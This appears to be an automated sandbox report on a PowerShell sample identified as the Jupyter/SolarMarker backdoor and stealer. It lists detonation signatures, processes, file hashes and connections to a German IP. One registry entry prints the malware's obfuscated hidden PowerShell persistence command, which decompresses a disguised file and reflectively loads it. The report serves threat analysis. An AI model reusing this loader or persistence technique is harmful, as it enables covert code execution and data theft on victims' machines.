Malware Analysis Report

2024-10-16 02:55

Sample ID 230413-rrz1psdc8t
Target script.ps1
SHA256 5a2366fb3d365e87f77a982d83eefb5054d50e8e73d2043979e5616c7071a458
Tags
jupyter backdoor stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5a2366fb3d365e87f77a982d83eefb5054d50e8e73d2043979e5616c7071a458

Threat Level: Known bad

The file script.ps1 was found to be: Known bad.

Malicious Activity Summary

jupyter backdoor stealer trojan

Jupyter Backdoor/Client payload

Jupyter, SolarMarker

Blocklisted process makes network request

Drops startup file

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2023-04-13 14:26

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-04-13 14:26

Reported

2023-04-13 14:37

Platform

win10-20230220-en

Max time kernel

642s

Max time network

653s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\script.ps1

Signatures

Jupyter Backdoor/Client payload

Description Indicator Process Target
N/A N/A N/A N/A

Jupyter, SolarMarker

backdoor trojan stealer jupyter

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\MICrosoft\WIndoWs\STARt meNU\pROgraMs\STArTUP\a666a8fda214cd9238e7fd9c62da9.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\.zgfdlkdwjy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\.zgfdlkdwjy\ = "nfivyqigfpw" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\nfivyqigfpw\shell\open\command C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\nfivyqigfpw C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\nfivyqigfpw\shell C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\nfivyqigfpw\shell\open C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000_Classes\nfivyqigfpw\shell\open\command\ = "poweRsHeLl -WIndOwsTYlE hiDdeN -Ep BYPass -cOMMand \"[sYStem.RefLeCtIoN.AsSembly]::loaD({$a0aa7c41ff34f981c548499da1e4a=NEw-oBJECT syStEm.iO.MemorYSTREAm(, $aRgS[0]);$a42eb79b0134e6981a8104636b9ca=NeW-OBjECt sYSTEM.iO.mEmorYsTrEam;$ad54b764e9845ab4de9dea2a69505=nEW-oBJecT SyStem.iO.COMPReSsiON.GZIPStREAm $a0aa7c41ff34f981c548499da1e4a, ([iO.cOmpreSsiOn.COmprESSIoNMOdE]::dEcOmpReSs);$ad54b764e9845ab4de9dea2a69505.CoPytO($a42eb79b0134e6981a8104636b9ca);$ad54b764e9845ab4de9dea2a69505.cLosE();$a0aa7c41ff34f981c548499da1e4a.ClosE();retuRn $a42eb79b0134e6981a8104636b9ca.tOaRraY();}.iNvOke([SysTeM.io.FiLe]::readalLbYTes('C:\\Users\\Admin\\AppData\\Roaming\\AdOBE\\IUAhWSYnwacetBJkHpG\\JYrgHGeXzFaift.YLMrkBnbRWCVeEFGZ')));[a0cb94b33de41cafdb3b130fc96f7.a1dc1fc073f4b6be3d290facb90f5]::a2197eb87d64aa8dada0c2f713e48()\"" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\script.ps1

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lajkrkag\lajkrkag.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES618D.tmp" "c:\Users\Admin\AppData\Local\Temp\lajkrkag\CSC8B4757A9AC8448BA5D5FEBD2A61AC.TMP"

Network

Country Destination Domain Proto
DE 37.221.114.23:80 tcp
JP 40.74.98.192:443 tcp
US 8.8.8.8:53 62.13.109.52.in-addr.arpa udp
DE 37.221.114.23:80 tcp
DE 37.221.114.23:80 tcp
DE 37.221.114.23:80 tcp
DE 37.221.114.23:80 tcp
DE 37.221.114.23:80 tcp
DE 37.221.114.23:80 tcp
DE 37.221.114.23:80 tcp
DE 37.221.114.23:80 tcp
DE 37.221.114.23:80 tcp
US 8.8.8.8:53 126.24.238.8.in-addr.arpa udp
US 8.8.8.8:53 1.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
DE 37.221.114.23:80 tcp
DE 37.221.114.23:80 tcp
DE 37.221.114.23:80 tcp
DE 37.221.114.23:80 tcp
DE 37.221.114.23:80 tcp
DE 37.221.114.23:80 tcp
DE 37.221.114.23:80 tcp
DE 37.221.114.23:80 tcp
DE 37.221.114.23:80 tcp
DE 37.221.114.23:80 tcp
DE 37.221.114.23:80 tcp

Files

memory/4452-125-0x000001C947260000-0x000001C947282000-memory.dmp

memory/4452-127-0x000001C92CD00000-0x000001C92CD10000-memory.dmp

memory/4452-128-0x000001C92CD00000-0x000001C92CD10000-memory.dmp

memory/4452-132-0x000001C947390000-0x000001C947406000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gayoq4ud.szc.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

\??\c:\Users\Admin\AppData\Local\Temp\lajkrkag\lajkrkag.cmdline

MD5 b82b3c610b1bd22fea2daca6e6fcbaea
SHA1 6f18be10592e3d1a4da6343ddcac726f9329ac4f
SHA256 16319d856ba93120b0e55efcfe44abadc942751e8afb5956d5ddc5a535489e5e
SHA512 7246e8d7b9f86dc034fa5ef5f28547c08a6f6394a8b18002b2c0dc04709aaf3d12bd42600f1c3a0d17efd410ee7f993f493eaac35d034ed60a8d566159ddddf9

\??\c:\Users\Admin\AppData\Local\Temp\lajkrkag\lajkrkag.0.cs

MD5 dae076349c85f1ed8db78fd3bd75473c
SHA1 33be9fc7f764edae76f95fe28f452b740a75d809
SHA256 9e3f4a1c1286b86413b4844e216248f1a95e8a13ee74c2c71412c2d6c571f156
SHA512 ae396e869013c2c70936858646aeac2289b17c16a4f2a6b938d6d2434a30e9785e010ff3c42b9c728cd8c002ea4c8190783665f575e15962553eb7b229b9a923

\??\c:\Users\Admin\AppData\Local\Temp\lajkrkag\CSC8B4757A9AC8448BA5D5FEBD2A61AC.TMP

MD5 244e097abf9183ad1e323ed52c620503
SHA1 be6815fe1b4930e5ccf4ea9477b61938b36f4c67
SHA256 5455ec4c2d6b5f5dba18ec1d2870ec3d47ad993174f0f21e19fb0a6e502f60d6
SHA512 2e61664cd3b946c133bd6dcc7adbc000dfb51f90964e0c7b6c91ca4f8fc2e683c946a3bd62c76d3237ca5f4ddd66bce277aea4dd788c10a62155d5d72ffced07

C:\Users\Admin\AppData\Local\Temp\RES618D.tmp

MD5 90f78bb940a4b01dda650b86097b948b
SHA1 e3828a76059b8a7a5a197da0cde7acac6ec79c23
SHA256 4c94e3efadc2a9674a3082ce77f8b5e441da143149315c15058ab37703d73ea1
SHA512 7889708aea0ef18425f5b10328354b7199119f85dbc3eaef01ce2e7bbcf5019f6ab5fc75b853560c570ca315c46f0a65c3c89742b16846ad14a92dee07030eec

C:\Users\Admin\AppData\Local\Temp\lajkrkag\lajkrkag.dll

MD5 73520d2b97645d9989fb0f5bb1aba355
SHA1 84ece3730dcdc6ae9dc336f397f43d1ec61dbce6
SHA256 d39562cabdf944a784e353b60c0e9ecbccb0102ff718aae74e0ef38b2efcdefa
SHA512 478138a3b2a427d07c99aae399e79eadbeb66386f5d5dc5d8b8c2883fe8536ad3ed0583f10eed5a8254bebd863c130f19c61341f0a4a86e1387fae90949b07ba

memory/4452-159-0x000001C9471A0000-0x000001C9471A8000-memory.dmp

memory/4452-194-0x000001C92CD00000-0x000001C92CD10000-memory.dmp

C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\DKgktXvNZPFr.RGQqJyjbphVErkPTA

MD5 27ae639baac5a409329887445c77646f
SHA1 8870aca8b8b0972c72f6ed23b07556ac83439558
SHA256 555d9fab18e5be0bffcb8cb097286be783bf4c8479b71cc33e382743c686ed54
SHA512 7434209a5e41842148d17c051c8ea17492b7949bcca5bc1334fb82f744bfbb449648f601ae805fd21efe04749d0e335c68d288add0a79566b24051096ff6e2c0

C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\zNadBQkwFgH.BYydUsvQFngElaxMeNt

MD5 0dd9a25dc9e735a89b895f1fe87633ff
SHA1 91bdb2d46c6d96b97032e6726e896fcffd3fa1fb
SHA256 b7a430f41cabcf2d1cc9905c7db08887a8f8861f9a98cd097762272412760ec6
SHA512 1922bb2d7a371ad0b5a1470df88eb3a0b934ed1e361d0c05900f08b04d2aeb13e6cdd585ea0a2a027067572ea90e3ca4b514b01fa927e6a2e86eaf168f083f3d

C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\MlUejLxHGgWDzqpS.VAMEOGeaouZvLrFcht

MD5 1139720144032052eb01c6741a039197
SHA1 5f1425d9261ec400d90743a91f5fe9674caa5c4d
SHA256 0d3805f498980feb2c2b247990fee00b217609850bb892be1ed2af3588577434
SHA512 928987d79463fdf02a65629089b7d8f8891b1e356e8e475799ec1554ef9f84bf0faa455f8fa460f87e9a6ef26510a324380e4515a11f974117e55750bb01f09a

C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\yeIhBUKQbW.iStXzqQUYKaDCn

MD5 16367ac998221144710b9ffd6d031b17
SHA1 699746b2bf59a22205f4882b0528190b08ada96d
SHA256 14079a86451292bda035cc4cd17638b4ef4edaa4a6ced9d81b1f10a1377607de
SHA512 51452d16ff6b632d8c3982a2dba2de63c6fc386010c7a6fbbfca2c93af5e47460d717296b2c940618e5b7c15314d4b419bbadfacfbe8db55fb582e22c98c21e3

C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\jbohTScZsKkXNRuzQ.UsadtGHOvVqoukKhPcW

MD5 e155224cda1a9854fe57af90bcb5b475
SHA1 d8030992f15f0aba20e51bce03cfd58b0be4df88
SHA256 7ca9fcf2fbbc599995b31849698b909602e8cacd501f4bfbfa3ca7d0e504b028
SHA512 e00a6202a841bd1d6180a62ccade7340cb4ac1ecf7829bc64d60909f9c5ce8f8b2720155676a41833149efa586343811d9fb897fb3d504b33f25929a4a11db78

C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\ASZQaXouDB.RkaAzwDjeUdspfto

MD5 acb79c1192de5be950567a971a40b5b9
SHA1 a19d8aad3dd2ef9560489972141be7d78e5d04b1
SHA256 01b4f03cb41dc3881dd052e466b528ac7073661aeef24596f480614fa7eb8e32
SHA512 88fa9bdcfa5ac8a81e36191e0bbb159b4bbd66a4f7bd26c28891bd76b68cfccb12f1989ff6772f792812d0c11ee82b9cc274a2a2ccebdf5bfde0747aaaaa593d

C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\AFqJfBoXcuCSZtsT.YoiMWFrqHSLzjkCexb

MD5 67502090d0cf262d4a14c19dfe69f524
SHA1 9b87390eed9e8afdf246e9148022244277ef5b13
SHA256 07fef04ad77fe166172937b8e9e38c2a9558a5c9da152f8430e122b54e7d83de
SHA512 2af2fb8620e95c04c2c6011370c6b5ee581cd91a04415a79f8f355baa59c6a682148c810a769bedd73d510c67d48921831d68fcc22c4eb8ae63ca09f7f339556

C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\oUbxfLjgKmXrdcT.FfHSadwzqrZTLg

MD5 a30104996081729cabdca7b08655e843
SHA1 dbc4fd5547f6d8c5365d7d6cca65d44647d868ba
SHA256 f3e32db459cab4f0db05919cc9f0652caf6eeaeeca25af82e843c7282f473ded
SHA512 68f7d7061acd8b367a7d44c9a20462621628c8d948d80c663ff8d16cba1edf7313001aec4591e39b5c7580b6dea675b673b4755915d2078886f1d85b65bf3257

C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\LnerWMBgjOSDcPliyzT.VtcNxBAgkWa

MD5 e2ff7820f8b7579747a670419a3aa125
SHA1 c09f64cd5dc0513804d6bebcb1c8c006c73fcc82
SHA256 7dabd2c07f0659c4eac0213a444e1ee2d587233858ce57edafa5ac381cb5b662
SHA512 f28882cff20694499f5a44d1bb2c80a127d57a21015dd855bcc9223630095ed8410ec63a3c8441b6f4112a848fc9868e7d8ab9b1d8a5af74fa1443bae41015a1

C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\bBVJEpqwhSOFXIGYm.uHSbcxtRyWIhlps

MD5 a057f748414f4673fe67793265d72453
SHA1 e856da5a9a93b6e7f02e9aec8459dc1b471abca3
SHA256 440714233f9df4549f0a6821152a74f8fb6f31519637cbfc9c2a71692f93cc80
SHA512 a27a17edee733605754fdbdee955a606d5c0544eed7e14fa6d82da83e1808ec306a67e490c4d1b140f374ecb532943048b9b7476a0ef3d7b7630014174c78121

C:\Users\Admin\AppData\Roaming\Adobe\IUAhWSYnwacetBJkHpG\ftTzqRAwCP.rckJNulozCVsPaMX

MD5 93035478adf3b3aafdd26edfd09b53b3
SHA1 79c924286ddb2e1d3f808437d777b06f061bb737
SHA256 449161c6e76077628f02136ecc85b324a8a95aa59db6514607c157b7b7e3c9b1
SHA512 5c56c022a828933f79c827f1cebc9111976d92454ae2b6ff5672f05bf672dcd649d852e33678bae5e5f1260152439d094cc1c1e2ba6de999bcb475e5442b72b2

memory/4452-362-0x000001C9471E0000-0x000001C9471F2000-memory.dmp

memory/4452-367-0x000001C92CD00000-0x000001C92CD10000-memory.dmp

memory/4452-368-0x000001C92CD00000-0x000001C92CD10000-memory.dmp

memory/4452-369-0x000001C92CD00000-0x000001C92CD10000-memory.dmp